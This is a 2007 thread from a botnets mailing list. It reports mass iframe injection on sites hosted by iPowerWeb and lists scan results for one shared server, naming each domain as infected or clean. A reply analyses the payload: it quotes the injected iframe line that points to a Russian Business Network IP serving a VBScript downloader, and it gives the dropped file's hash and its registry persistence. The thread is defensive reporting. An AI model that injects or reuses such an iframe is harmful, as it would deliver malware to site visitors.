To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
William, Another thought would be to block the IP where these iframes point to...
From the first javascript on the page of them all...
"iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter"
The 81 IP is a russian host that has a long history in hosting malware and viruses. Anyhow the "index.html" is actually a VBscript that downloads a file ( work.exe) using a specific CLSID and ADODB to... "TMP" directory on the victim. Not sure yet were it's stored on victim OS. This file which seems to be partially detected by the AV market has these characteristics. MD5: ed479b8ea0ce903052be3be8b401bac4 Size: 27K (27678 bytes) Packed: Yes Packer: WinUpack 0.39 Quick Analysis: File System Changes/Mods/Additions/Deletions ------------------------ Copies itself to "C:\Documents and Settings\<victim account>\xx_<4_random_lowercase_letters>.exe" Registry Changes----------------------- HKLM\Software\Microsoft\Windows\CurrentVersion\Run "xx_Shell="C:\Documents and Settings\<Victim>\xx_<4_random_lowercase_letters>.exe" Network Connections----------------- - None noted ---- Until I can rip the packer off I can't easily look through the rest of the binary. Hope that helps, Jake Babbin inetnum: 81.95.144.0 - 81.95.147.255 netname: RBNET descr: Russian Business Network admin-c: RBNR-ORG tech-c: RBNR-ORG mnt-by: RBN-MNT status: ASSIGNED PA country: RU remarks: INFRA-AW source: RIPE # Filtered role: Russian Business Network Registry address: Russian Business Network address: 12 Levashovskiy pr. address: 197110 Saint-Petersburg address: Russia remarks: Points of contact for RBN Network Operations remarks: ------------------------------------------------------ remarks: Routing and peering issues: [EMAIL PROTECTED] remarks: SPAM and Network security issues: [EMAIL PROTECTED] remarks: Customer support: [EMAIL PROTECTED] remarks: General information: [EMAIL PROTECTED] remarks: ------------------------------------------------------ admin-c: ON316-RIPE admin-c: NI212-RIPE tech-c: MZ2231-RIPE tech-c: NI212-RIPE nic-hdl: RBNR-ORG mnt-by: RBN-MNT source: RIPE # Filtered abuse-mailbox: [EMAIL PROTECTED] % Information related to '81.95.144.0/20AS40989' route: 81.95.144.0/20 descr: TcS Network origin: AS40989 mnt-by: RBN-MNT source: RIPE # Filtered On 1/21/07, William Atchison <[EMAIL PROTECTED]> wrote:
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- If you ever wondered how botnets keep growing, not like it's a big mystery, the host iPowerWeb has many servers that are just filthy with infected sites waiting to exploit any unprotected browser. I stumbled across the problem because people visiting one of my sites were complaining that links to sites on iPowerWeb servers were tripping their anti-virus software. When I complained to iPowerWeb about the handful of sites I initially knew about they just cleaned the index pages on those domains and left the rest of the server messed up. They tell their customers that find this problem to change their FTP passwords, what a joke. PCWORLD printed an article "Net Watchdog: Hacked Site Causes Headaches" that is almost 7 months old describing the exact same issues with this very same host so this is nothing new, they've known about it for quite some time yet it persists. http://www.pcworld.com/printable/article/id,126508/printable.html I quickly found about 12 infected servers, so I wrote a script to scan the domains on one shared server just to see how bad the problem was per server. See for yourself the example from a single server: WARNING: disable javascript before visiting these domains IFRAME INJECTOR SCRIPT report for server: 66.235.217.112 accessplans.com ... INFECTED ace-designz.com ... INFECTED aerostamps.com ... INFECTED airstream-bohemia.com ... INFECTED aislesay.com ... OK ajsupply.net ... INFECTED akarocks.com ... INFECTED alair.com ... OK alloccasion.com ... OK alterthespians.com ... OK ameriservplumbing.com ... OK andrexconsulting.com ... INFECTED anthonywayneasse.org ... INFECTED antiguaculture.com ... OK argyle-weekend.org ... OK arkasizer.com ... INFECTED artsplosion.com ... OK ashlerlodge.org ... INFECTED asia-resources.com ... INFECTED atvmaine.net ... OK auraya.com ... OK avalonandalusians.com ... OK baker-offshore.com ... OK ben-sinai.com ... INFECTED benyo.com ... OK berryranch.net ... INFECTED bigbendyoga.com ... OK bistrocatering.com ... INFECTED bluekey.org ... INFECTED boogietek.com ... OK bootlegtrading.net ... OK bottomtime.net ... INFECTED brriverbats.com ... OK bruceellman.com ... INFECTED bsplaborlaw.com ... OK bullpencatcher.com ... OK cafeiris.com ... OK camouflageracing.com ... OK canddsolutions.com ... OK capitalweekend.org ... OK cashmarkmedia.com ... OK catsoriginalbooktales.com ... OK cccntr.com ... OK cdgenealogy.net ... OK centralsupplyco.biz ... INFECTED chefjuke.com ... OK cobonline.org ... OK codeinc.org ... OK composite-sourcing.com ... OK confusionism.com ... OK considerballoons.com ... INFECTED coretesting.net ... INFECTED countrysquirecleaners.com ... INFECTED criticalillnessinsuranceservices.com ... INFECTED crs-us.com ... INFECTED davidakinministry.org ... OK demadiur.com ... OK design-by-klein.com ... INFECTED designbenedictusa.com ... INFECTED diannadunn.com ... OK digi-magine.net ... INFECTED djmikeandrew.com ... INFECTED dlbrown.com ... INFECTED donjusticecabinetmakers.com ... OK drlandis.com ... OK dungeonhawaii.com ... OK durhamcuisine.com ... OK e-biz-resource-center.com ... OK efilefinancial.com ... OK egcollins.com ... INFECTED emediez.com ... OK english-vip.com ... INFECTED eyecandy-gallery.com ... OK family2family.net ... OK fbckh.com ... OK federalleague.com ... OK fjexpeditions.com ... OK flattrackmac.com ... OK floramedica.com ... INFECTED floridabestvalue.com ... INFECTED floweringtreesociety.org ... INFECTED focusenglish.com ... INFECTED forchuteckconsulting.com ... OK fourstorydesign.com ... OK fraud-forgery.com ... INFECTED freestonestudio.com ... OK fssequipment.com ... OK gavinstudio.com ... OK gilroyrangeriders.com ... OK ginascipione.com ... OK graphics-by-gunslinger.com ... OK greendaleentertainment.com ... OK h-arts.net ... OK harrygamboajr.com ... OK hawaiiraves.com ... OK hbsaai.org ... OK hearninsurance.com ... OK heartwoodseniorliving.com ... OK hellenicbar.org ... INFECTED hiddenrest.com ... OK holden-tech.com ... OK holovisions.net ... INFECTED holyrosaryduryea.com ... OK homeanddoor.com ... OK houghtonlake.us ... OK humbertogarza.com ... OK ideationdesigns.com ... INFECTED ilusaw.com ... INFECTED imt.us ... INFECTED indahbulan.com ... OK indyoffice.net ... INFECTED indyoptics.com ... INFECTED inhiswill.org ... OK ipdistributors.com ... INFECTED itconsulting-ga.com ... INFECTED ivyleafschools.org ... OK jackiepock.com ... OK jamesness.com ... OK jason-abbott.com ... OK jasonabbott.com ... OK jds-inc.com ... INFECTED jedifiction.com ... OK jefko.com ... INFECTED jnjcars.com ... INFECTED joelbissonnette.com ... OK johndenvertribute.com ... OK josephbrewster.com ... INFECTED jrcai.com ... INFECTED jumparoundrentals.com ... INFECTED jvguitars.com ... OK kckgraphics.com ... INFECTED kinshipkennel.com ... INFECTED langansloft.com ... INFECTED lanwrx.com ... OK laptoptek.com ... OK lighthousephotorepair.com ... OK littlebirch.com ... INFECTED liz-weber.com ... OK lonebrushman.com ... OK lorryannphoto.com ... OK lostcreektech.com ... OK loughrynn.net ... OK malevichsociety.org ... INFECTED manuind.com ... INFECTED massageamerica.us ... INFECTED matlogix.com ... INFECTED mcgirlscouts.org ... OK mckeesportsharks.com ... OK meluso.com ... INFECTED milieu-design.com ... OK mindtech-group.com ... INFECTED moonlightindustries.com ... OK moopigface.com ... OK msbishop.com ... INFECTED multipol.com ... INFECTED muzuya.com ... INFECTED myrtlebeachexperience.com ... OK mysterypr.com ... INFECTED mysticalstar.com ... OK mysticplayers.org ... OK neiroukh.org ... OK nygroup.com ... OK onekaonline.com ... INFECTED ontopofacloud.com ... INFECTED operationsnehemiah.org ... OK opfes.com ... OK oxboro.org ... OK pack22.org ... OK paintmeaportrait.com ... OK paulamartin.com ... OK peacewithmusic.org ... OK portlandfiremuseum.com ... OK precisionfleetservices.com ... INFECTED principalmentor.com ... INFECTED process-evolution.com ... INFECTED pscsafe.com ... INFECTED psychoward.com ... INFECTED purseparadise.com ... OK ratwilder.com ... OK realfood4dogs.com ... INFECTED rememberwhenflowersandgifts.com ... INFECTED rent2you.com ... OK rermotorsports.com ... OK rernetworking.com ... OK revelationcafe.com ... OK rgchurch.org ... OK rgcm.org ... INFECTED robertvanderhorst.com ... OK robocap.net ... OK rotorspins.com ... OK roundvalley83.com ... INFECTED rsahawaii.com ... OK rscds-greaterdc.org ... OK saccityweb.com ... INFECTED safeandsoundsitters.com ... OK sail1620.org ... OK sandrarussell.com ... INFECTED sanfranciscogymnastics.com ... INFECTED savethelemur.org ... INFECTED schwimmersenterprises.com ... OK sempiternalproductions.com ... INFECTED sfangels.com ... OK sight-sound-djs.com ... INFECTED signmaxcsg.com ... INFECTED siloambio.com ... OK sjtosa.org ... OK socalrealtyclub.com ... OK soccercommercials.com ... OK soundbitten.com ... OK southtownpits.com ... OK speedrailltd.com ... OK ssmn-e.com ... INFECTED standardwebsolutions.com ... OK steventorres.com ... INFECTED sthphoto.com ... INFECTED stuartlea.com ... INFECTED studygroupinc.org ... OK successcoach.net ... INFECTED summerwindimporters.com ... OK sunsetglamour.com ... OK superiorlures.com ... OK suzysikora.com ... INFECTED swnight.com ... OK syafootball.org ... OK sycamorecreekranch.com ... INFECTED systemheating.com ... INFECTED tacoutdoors.net ... INFECTED tactechnology.com ... INFECTED tcm-training.com ... INFECTED tempmakers.com ... OK tewahdo.com ... INFECTED thecoper.com ... OK thequiltdepot.com ... OK therothfamily.net ... INFECTED thethemeroom.com ... OK timetodare.com ... OK timstewart.com ... INFECTED tokyophysio.com ... INFECTED totalenergyonline.com ... INFECTED tradewindrealty.com ... OK trichurch.com ... INFECTED tridentmartialsystems.com ... OK trilliumdesigngroup.com ... INFECTED tropicalgardenfurniture.com ... INFECTED troublecreek.com ... INFECTED turnkeytechnology.net ... OK tychiosleather.com ... OK unidosporcolombia.com ... OK usa-hapkido.com ... OK valleroy.net ... INFECTED velozphotography.com ... OK visionweddingveils.com ... INFECTED waterpistolmusic.com ... OK waterwonderlandchorus.org ... OK wcd3dwebdesign.com ... INFECTED webdesignforsoho.com ... OK webuyhousescash.com ... INFECTED westonhurt.com ... OK whisperingalley.com ... OK whitebluffmga.com ... INFECTED winsoftly.com ... INFECTED woodfloor.com ... INFECTED wowdates.com ... OK wutancanada.com ... INFECTED wuurld.org ... OK yahrzeit.org ... INFECTED yamasato.com ... INFECTED -- Bill Atchison http://www.crawlwall.com _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
